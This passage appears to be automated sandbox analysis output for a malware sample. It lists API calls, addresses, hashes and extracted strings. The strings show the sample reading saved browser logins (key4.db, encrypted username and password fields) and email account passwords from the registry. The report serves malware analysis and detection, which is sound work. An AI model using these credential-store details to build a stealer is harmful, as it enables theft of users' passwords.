                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                                                                      • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                                    • API String ID: 4171719235-3943159138
                                                                                                                                                                                                                                    • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                                                                    • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                                                                                                                                                    • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,7576E430,?,00000000), ref: 00402533
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                                    • API String ID: 168965057-606283353
                                                                                                                                                                                                                                    • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402869
                                                                                                                                                                                                                                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,7576E430,?,00000000), ref: 004028A3
                                                                                                                                                                                                                                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7576E430,?,00000000), ref: 0040297B
                                                                                                                                                                                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                                    • API String ID: 1497257669-167382505
                                                                                                                                                                                                                                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                                                                    • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                                    • API String ID: 1428123949-3474136107
                                                                                                                                                                                                                                    • Opcode ID: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                                                                                                                                    • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2998058495-0
                                                                                                                                                                                                                                    • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                                      • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                                                                    • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                                                                    • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                                                                    • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                                                                      • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                                                                      • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                                    • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                                    • API String ID: 2303586283-933021314
                                                                                                                                                                                                                                    • Opcode ID: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                                                                                                                                    • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                                                                                                    • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                                                                                                                                    • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                                                                                                                                    • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                                                                                                                                    • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                                    • API String ID: 231171946-2189169393
                                                                                                                                                                                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                                    • API String ID: 633282248-1996832678
                                                                                                                                                                                                                                    • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406782
                                                                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                                                                    • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                                                                    • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                                                                                                                                    • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • , xrefs: 00406834
